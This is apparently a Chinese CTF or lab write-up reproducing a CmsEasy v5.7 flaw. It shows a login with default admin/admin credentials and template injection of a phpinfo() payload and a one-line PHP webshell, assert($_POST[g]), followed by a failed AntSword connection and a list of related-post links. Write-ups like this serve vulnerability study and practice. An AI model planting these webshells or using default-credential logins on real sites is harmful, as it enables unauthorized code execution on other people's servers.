【Web】CmsEasy 漏洞复现

访问主页

到处点一点没啥发现

扫目录

访问/admin

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

CmsEasy_v5.7 漏洞测试

payload1:

1111111111";}<?php phpinfo()?>

payload2:

11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?

相关推荐
Mr_Fmnwon2 小时前
【我的 PWN 学习手札】tcache stash unlink
pwn·ctf·heap·tcache
云卓科技3 小时前
无人机之数据提取篇
科技·安全·机器人·无人机·制造
唐·柯里昂7983 小时前
[3D打印]拓竹切片软件Bambu Studio使用
经验分享·笔记·3d
山兔13 小时前
工控安全防护机制与技术
安全
sml_54214 小时前
【笔记】连续、可导、可微的概念解析
笔记·线性代数
新手unity自用笔记4 小时前
项目-坦克大战学习-子弹的移动与销毁
笔记·学习·c#
Word码4 小时前
数据结构:栈和队列
c语言·开发语言·数据结构·经验分享·笔记·算法
我命由我123454 小时前
SSL 协议(HTTPS 协议的关键)
网络·经验分享·笔记·学习·https·ssl·学习方法
HEX9CF5 小时前
【CTF Web】Pikachu xss之href输出 Writeup(GET请求+反射型XSS+javascript:伪协议绕过)
开发语言·前端·javascript·安全·网络安全·ecmascript·xss
火红的小辣椒5 小时前
XSS基础
android·web安全